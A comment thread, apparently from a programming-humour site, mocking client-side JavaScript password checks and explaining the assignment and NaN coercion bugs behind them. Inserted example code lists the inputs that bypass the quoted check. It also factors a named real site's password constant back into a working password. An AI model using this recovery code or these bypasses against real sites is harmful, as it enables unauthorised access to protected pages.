• Anonymous Coward (unregistered)

    [Y]

  • (cs)

    You gotta have all your bases covered.  What happens when 90210 no longer has a length of five?  Then you're screwed!

    What I really don't get is:

    var pass = dataform.pass.value;

    Is called twice. I wonder why they did that?

  • MrMe (unregistered) in reply to Ytram
    Ytram:
    You gotta have all your bases covered.  What happens when 90210 no longer has a length of five?  Then you're screwed!

    What I really don't get is:

    var pass = dataform.pass.value;

    Is called twice. I wonder why they did that?



    I can see the code being just the portion (if pass==9002) {} and then a junior developer being requested to add more specific error messages such as "Password Required" and "Incorrect Password"... hence copy+paste without understanding

  • (cs) in reply to Anonymous Coward
    Anonymous Coward:

    Subject: First Post
    [Y]



    Hurray.  You're the first poster to the thread.  What do you get?

    Oh that's right, absolutely nothing.
  • (cs)

    <SARCASM>Well, if you're gonna go to that much trouble to make sure they put in exactly 90210 then why not just tell them the password on the page and say something like "You must enter 90210 or access will be denied"?</SARCASM>

  • MrMe (unregistered) in reply to Ken Nipper

    I'm just surprised the password wasn't "13373"

  • MrMe (unregistered)

    Alex Papadimoulis:


      if (pass = 90210){
        return true;
      }

    }


    If pass = 90210??? looks like an assignment rather than a comparison to me!

  • Matt (unregistered) in reply to Ken Nipper

    I've got it. They forgot this code:

     if (pass != 90210) {
         alert("wrong password");
         dataform.pass.focus();
         return false;
     }

  • BereaBorn (unregistered)

    Yeah, that's a popular password here...but hopefully this validation is not quite so popular...

  • James Baker (unregistered)
    Alex Papadimoulis:


    if (pass = 90210){
    return true;
    }



    So after all that checking, it then returns true anyway. Oldest mistake in the book!
  • Gary (unregistered) in reply to James Baker
    Anonymous:
    Alex Papadimoulis:


    if (pass = 90210){
    return true;
    }



    So after all that checking, it then returns true anyway. Oldest mistake in the book!


    And that explains the code. Some newbie couldn't figure out why it always let people in, even with the wrong password. So they added all the "wrong" conditions rather than figuring out how to type an extra "=".

    Time to raise the old "paid by the line" argument again?
  • epsalon (unregistered) in reply to James Baker
    Anonymous:
    Alex Papadimoulis:


    if (pass = 90210){
    return true;
    }



    So after all that checking, it then returns true anyway. Oldest mistake in the book!


    No it doesn't because of the checks before. My guess is that the "developer" didn't spot this error, and was puzzled why access was granted when he wanted to deny. So, he started adding the checks in the start, until it finally worked.
  • blasterz (unregistered) in reply to James Baker

    Not quite. It has to pass through the oh-so-intimidating gauntlet of not being less than or greater to 90210, and having a length of 5. It does do an assignment, but it has to be 90210 by that point anyway.

  • khoker (unregistered)

    The tragedy here is that this is Javascript. Shaun didn't read the source for the answer, he literally did View -> Page Source to get the password.

    I'm also guessing this was maybe an ASP developer as the solution seems pretty straight forward if you don't know you can use != or ==

  • (cs)

    They forgot:

      if (pass == "Password" ) {
        alert("We're not [quite] that dumb!");
        dataform.pass.focus();
        return false;
      }

  • (cs)

    I saw somebody get into this page with a password of ***** (they didn't know I was watching, ha ha)

  • coward (unregistered) in reply to Maurits

    A real consultant would write the code the following way (for job security):

    if pass == 0 return false
    if pass == 1 return false
    .
    .
    if pass == 90210 return true
    if pass == 90211 return false
    if pass == 90212 return false
    .
    .
    to infinity.


  • MrMe (unregistered) in reply to Maurits

     not being a javascript guru myself I'm assuming that the line if (pass > 40017) will generate an error if the user entered in a five digit alpha string, as it would try and convert the string to an integer to compare against the value of 40017?

  • (cs)

    According to bad 80's computer-related movies, all I have to do is type "override password" to get around such high-level security measures.

  • WaterBreath (unregistered) in reply to MrMe

    I'm not a javascript guru either, but I like your suggestion better than most others posted.

    My initial thought was that it would prevent the hexadecimal or octal formats of the number ("9C51" or "116 121") from being accepted as valid...  But odds are good either javascript doesn't offer that type of auto-conversion, or it's giving the developer more credit than they deserve.

  • (cs) in reply to MrMe
    Anonymous:
     not being a javascript guru myself I'm assuming that the line if (pass > 40017) will generate an error if the user entered in a five digit alpha string, as it would try and convert the string to an integer to compare against the value of 40017?


    > forces a numeric context on both sides.

    If the "pass" variable contains a non-numeric string, numeric context will interpret it as NaN ("not a number")

    NaN > 40017 is false
    NaN < 40017 is also false
    NaN == NaN is false as well
  • (cs) in reply to Maurits

    So... taking everything into account... this code is STILL BROKEN

    "90210" will work, as it should
    "90209" and "90211" will fail, as they should
    But ANY five-character password that numifies to NaN will also work, which is an error.

  • Alex (unregistered)

    You're all missing the big question here -  Is viewing the page source to obtain the password a violation of the DMCA?

  • (cs) in reply to MrMe
    Anonymous:
     not being a javascript guru myself I'm assuming that the line if (pass > 40017) will generate an error if the user entered in a five digit alpha string, as it would try and convert the string to an integer to compare against the value of 40017?


    Not quite generating an error... IIRC in javascript (string > number) or vice versa will always be false. So for this rather complex password system, any 5-character alphabetic string will be accepted.

    (Just checked with the javascript console in firefox, and this code apparently does consider "hello" to be the correct password)
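
    The following is an added example, not code from the page or from the site being discussed. It reconstructs the check as the comments above describe it (empty test, length test, less-than and greater-than tests, then `if (pass = 90210)` with a single `=`; the exact messages and ordering are an assumption, since the original is not shown here), and walks one input through each operator so the NaN path Maurits describes and the "hello" result from the Firefox console become visible. `fixedCheck` is the strict-comparison version; it closes the coercion hole only, the secret is still in the page source.

    ```javascript
    // Added example; not code from the page. The comments describe the original
    // check as: an empty-password test, a length-of-5 test, less-than and
    // greater-than tests against 90210, and finally `if (pass = 90210)` with a
    // single `=`. This reconstruction follows that description (assumption: the
    // exact messages and ordering of the original are not shown on the page).
    function legacyCheck(pass) {
      if (pass == "") return "Password Required";
      if (pass.length != 5) return "Incorrect Password";
      if (pass < 90210) return "Incorrect Password"; // string is coerced to a number
      if (pass > 90210) return "Incorrect Password"; // NaN compares false both ways
      if (pass = 90210) { // assignment, not comparison: 90210 is truthy
        return true;
      }
      return false;
    }

    // Breaks one input down operator by operator so the NaN path is visible.
    function probe(pass) {
      return {
        numeric: Number(pass),       // NaN for any non-numeric string
        lt: pass < 90210,
        gt: pass > 90210,
        looseEq: pass == 90210,      // true for "90210" after coercion
        strictEq: pass === "90210",  // same type and value, no coercion
        accepted: legacyCheck(pass) === true,
      };
    }

    // Strict comparison of the submitted string: no coercion, so no NaN bypass.
    // This only fixes the comparison; the secret is still readable in the page
    // source, and the real fix is to check on the server.
    function fixedCheck(pass) {
      return typeof pass === "string" && pass === "90210";
    }

    // Runs a candidate list through a check and returns the inputs it lets in.
    function acceptedBy(check, candidates) {
      return candidates.filter((c) => check(c) === true);
    }

    // Constructed inputs: the real password, its neighbours, and five-character
    // strings that coerce to NaN, Infinity or 0.
    const CANDIDATES = ["90210", "90209", "90211", "hello", "abcde", "9021a", "1e999", "     ", ""];

    // acceptedBy(legacyCheck, CANDIDATES) -> ["90210", "hello", "abcde", "9021a"]
    // acceptedBy(fixedCheck, CANDIDATES)  -> ["90210"]
    ```

    Note that "1e999" and five spaces are rejected: they coerce to Infinity and 0, which do compare against 90210. Only inputs that coerce to NaN slip past both relational tests and reach the assignment.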
  • shim (unregistered) in reply to MrMe
    Anonymous:
    I'm just surprised the password wasn't "13373"


    Because normally it's "3l337." :)
  • (cs)

    So if someone enters "abcde" as a password it lets you in because it makes it through all the preliminary ifs and then the = vs == bug kicks in?



  • Matt Brantly (unregistered) in reply to Alex
    Anonymous:
    You're all missing the big question here -  Is viewing the page source to obtain the password a violation of the DMCA?


    Rue the day something like THAT goes to court.
  • (cs)

    i once saw some similar js in a "are you a good hacker" series.

  • (cs)

    Quite a few adult sites had these genius JS passwd protections back in the good old days. It was actually quite fun just to surf around different sites to find out what they had tried out. Oh boy the amount of free quality porn

  • Chris McKenzie (unregistered)

    Leaving aside the fact that this code was available in the "View Source," it's apparent that the programmer wrote the if (pass = 90210) block first.  He's using an assignment operator instead of the compare operator.

    I imagine that his initial tests allowed any password through because his if-block always returned true. Then, instead of discovering that he had an invalid operation in his if-block, he wrote the other tests to systematically filter out bad passwords.

    All I can say is ... wow!

  • (cs) in reply to Chris McKenzie

    It's a guessing game. They should have messages like "Ooh, nice try" or "try again, maybe a little lower."

    Better, Levenshtein distances comparing the password to the entered data, and to the last entered attempt, so the program could reply with "getting warmer...colder...warmer..."

  • (cs) in reply to OneFactor

    OneFactor:
    So if someone enters "abcde" as a password it lets you in because it makes it through all the preliminary ifs and then the = vs == bug kicks in?

    No, "abcde" would evaluate to zero, and 0 < 90210, so it'd fail.

    The code seems to work, albeit stupidly.

  • (cs) in reply to Otto
    Otto:

    OneFactor:
    So if someone enters "abcde" as a password it lets you in because it makes it through all the preliminary ifs and then the = vs == bug kicks in?

    No, "abcde" would evaluate to zero, and 0 < 90210, so it'd fail.

    The code seems to work, albeit stupidly.

    Nevermind. I forgot that string comparisons to numbers are always false.

    Any 5 character string would work.

  • Student (unregistered)

    I guess the second var pass = dataform.pass.value; was purely written out of frustration because he thought maybe the pass variable has magically changed to the correct password.
    I also have a tendency to write random obsolete code when I'm getting frustrated on a problem late at night, just so I can get the code to work.

  • (cs)

    And they congratulate you for remembering it!

  • (cs)

    A Wizard A True Star:
    It's the zip code below the link. And in case you still can't remember it, they bolded it!

    what's with all the other crazy javascript when you do a view source?

  • (cs)

    Did anyone report this vulnerability to Bugtraq or the vulnerable site before publishing a working exploit?

  • Betty (unregistered) in reply to emptyset
    emptyset:
    what's with all the other crazy javascript when you do a view source?


    'Clever' obfuscation?
  • (cs)

    WTF... ! -_-

  • (cs) in reply to Wire

    Wire:
    Did anyone report this vulnerability to Bugtraq or the vulnerable site before publishing a working exploit?

    It would appear so, or someone else checked it. The code's been changed to something a *little* more obscure.  But the password still works!

  • (cs) in reply to bugsRus

    Bob Hammer (Hammer Production Company) should become security consultant. He improved the code. The password is not right there in the code anymore, instead it uses some freak numerology now. Beautiful.

    You know, someone should build an http server that can ask for a password for certain parts of your site. I'd PAY for that! And they also should somehow encrypt the traffic so that your passwords can't be sniffed.

    Oh wait, we can LEVERAGE the client's JAVASCRIPT CAPABILITIES for that!

    P.S.:

    CSIsW3CDOM = ((document.getElementById) && !(IsIE()&&CSBVers<6)) ? true : false;

    P.S.2:

        var lpass=(pass.length)+1
        for (l=1; l<lpass; l++){
            K[l]=pass.charAt(l)
        }

    this is like saying:

        K=pass

    right? BRILLANT! Where can I hire this guy?

  • JoeJoe (unregistered) in reply to joost

    I can just hear the dev saying: "It's server side, see? The page sits on a server!"

  • (cs)

    Go here for a more sophisticated version of this wtf

    http://www.paidsurveysonline.com/


    Its obviously a scam site, but check out the source for memberaccess......
    http://www.paidsurveysonline.com/membersaccess.html

    So there's just one password, and you'd just have to write a quick brute force program to start multiplying characters of strings together until you got that number.

    As a side note, this site is advertised here on wtf, is it perhaps put there by google for wtfness?

    //Encrypted Password script- By Rob Heslop
    //Script featured on Dynamic Drive
    //Visit http://www.dynamicdrive.com


    function submitentry(){
        password = document.password1.password2.value.toLowerCase()
        username = document.password1.username2.value.toLowerCase()
        passcode = 1
        usercode = 1
        for(i = 0; i < password.length; i++) {
            passcode *= password.charCodeAt(i);
        }
        for(x = 0; x < username.length; x++) {
            usercode *= username.charCodeAt(x);
        }
        //CHANGE THE NUMBERS BELOW TO REFLECT YOUR USERNAME/PASSWORD
        if(usercode==2.90171130144904e+22&&passcode==24386094146700)
        //CHANGE THE NUMBERS ABOVE TO REFLECT YOUR USERNAME/PASSWORD
        {
            window.location=password+".htm"}
        else{
            alert("password/username combination wrong")}
    }
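
    The brute force the poster above suggests does not even need to be a brute force. The following is an added example, not code from the page or from the Dynamic Drive script: because the "encryption" is a product of char codes, the constant in the page can be factored back into every password that produces it, in a fraction of a second. `passcodeOf` repeats the script's loop exactly so results compare against the page's constant the same way the script does; the alphabet (a-z and 0-9, since the script lowercases input) is an assumption.

    ```javascript
    // Added example; not code from the page or from the Dynamic Drive script.
    // The script's "encryption" multiplies the char codes of the lowercased
    // password, so the constant in the page is a product of small integers and
    // can be factored back into every password that produces it.

    // Same arithmetic as the script's loop, so comparisons against its
    // constants behave identically (including floating-point rounding above 2^53).
    function passcodeOf(str) {
      let code = 1;
      for (let i = 0; i < str.length; i++) {
        code *= str.charCodeAt(i);
      }
      return code;
    }

    // The script lowercases input, so a-z and 0-9 cover typical passwords
    // (assumption: no punctuation or non-ASCII characters).
    const ALPHABET = [];
    for (let c = 48; c <= 57; c++) ALPHABET.push(c);   // "0".."9"
    for (let c = 97; c <= 122; c++) ALPHABET.push(c);  // "a".."z"

    // Depth-first search for multisets of char codes whose product is `target`.
    // Codes are taken in non-decreasing order so each multiset is found once;
    // every permutation of a result is also accepted, because multiplication
    // is commutative. Results are re-checked with passcodeOf so that rounding
    // in the division cannot produce a false positive for large targets.
    function findPreimages(target, maxLen = 12, limit = 1000) {
      const found = [];
      function dfs(remaining, minIdx, chosen) {
        if (found.length >= limit) return;
        if (remaining === 1) {
          if (chosen.length > 0) found.push(String.fromCharCode(...chosen));
          return;
        }
        if (chosen.length >= maxLen) return;
        for (let i = minIdx; i < ALPHABET.length; i++) {
          const c = ALPHABET[i];
          if (remaining % c === 0) {
            chosen.push(c);
            dfs(remaining / c, i, chosen);
            chosen.pop();
          }
        }
      }
      dfs(target, 0, []);
      return found.filter((s) => passcodeOf(s) === target);
    }

    // The password constant from the script quoted above.
    const PASSCODE = 24386094146700;

    // findPreimages(PASSCODE) includes "567ersu"; any reordering of those seven
    // characters, e.g. "ruse567", gives the same product and is accepted too.
    ```

    Two further observations follow from the script itself. The username constant 2.90171130144904e+22 is above 2^53, so the product is computed with rounding and many distinct usernames collide onto it. And the script redirects to `password + ".htm"`, so the "protected" page is simply named after the password and can be requested directly without running the check at all.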

  • (cs)
    A Wizard A True Star:

    Oh. My. God.

    It's the zip code below the link. And in case you still can't remember it, they bolded it!


    Oh, come on. The real WTF here is that the target page is not protected whatsoever. You can just copy&paste its URL in the address box and hit return to open it. Very usable.

    Ever seen a website where index.html will ask for a password, but all other pages will be ass-wide open? Including directory listing of directories with no index.html?

    Or the frameset page asks for a password, but the pages inside the frameset can be accessed directly?

  • (cs) in reply to Filthysock
    Filthysock:

    Go here for a more sophisticated version of this wtf

    http://www.paidsurveysonline.com/


    ...

    //Encrypted Password script- By Rob Heslop
    //Script featured on Dynamic Drive
    //Visit http://www.dynamicdrive.com

    ...

    for(i = 0; i < password.length; i++) {
    passcode *= password.charCodeAt(i);
    }
    for(x = 0; x < username.length; x++) {
    usercode *= username.charCodeAt(x);
    }

    ...


    Ahh they need to optimise the for loop so that they don't have to calculate the string length in each loop.

    for(i = 0,iLen=password.length; i < iLen; i++) {
        passcode *= password.charCodeAt(i);
    }
    for(x = 0,xLen=username.length; x < xLen; x++) {
        usercode *= username.charCodeAt(x);
    }


    There that fixed it.

  • (cs) in reply to joost

    Not quite. Because of his less than complete understanding of the way arrays work the first character of pass will be dropped when being transferred into K. Therefore any character followed by 4017 will result in an authenticated password. Unfortunately the redirection mechanism is

    location.href=pass+".html";

    so you won't go to the right page if you give it an "incorrect" password even though it verified it.

    Good fun.

  • (cs) in reply to joost
    joost:
    Bob Hammer (Hammer Production Company) should become security consultant. He improved the code. The password is not right there in the code anymore, instead it uses some freak numerology now. Beautiful.

    You know, someone should build an http server that can ask for a password for certain parts of your site. I'd PAY for that! And they also should somehow encrypt the traffic so that your passwords can't be sniffed.

    Oh wait, we can LEVERAGE the client's JAVASCRIPT CAPABILITIES for that!

    P.S.:

    CSIsW3CDOM = ((document.getElementById) && !(IsIE()&&CSBVers<6)) ? true : false;
    P.S.2:

        var lpass=(pass.length)+1
        for (l=1; l<lpass; l++){
            K[l]=pass.charAt(l)
        }

    this is like saying:

        K=pass

    right? BRILLANT! Where can I hire this guy?



    My previous post was in reference to this post...
  • tim (unregistered) in reply to coward
    Anonymous:
    A real consultant would write the code the following way (for job security):
    if pass == 0 return false
    if pass == 1 return false
    .
    .
    if pass == 90210 return true
    if pass == 90211 return false
    if pass == 90212 return false
    .
    .
    to infinity.


    LOL - wait for it, it will be tomorrows WTF I'm sure... and for job security? Because if they wanted to change the password from 90210 to, say, 90201 then he would have to be employed again long enough to change the true's and falses...
  • vhawk (unregistered)

    C'mon, you are joking .  Not even a first year CS student can be this obviously stupid. Who QA'ed this code - he should be joining the programmer for Code Security Concepts 101

Leave a comment on “Window Decal Security”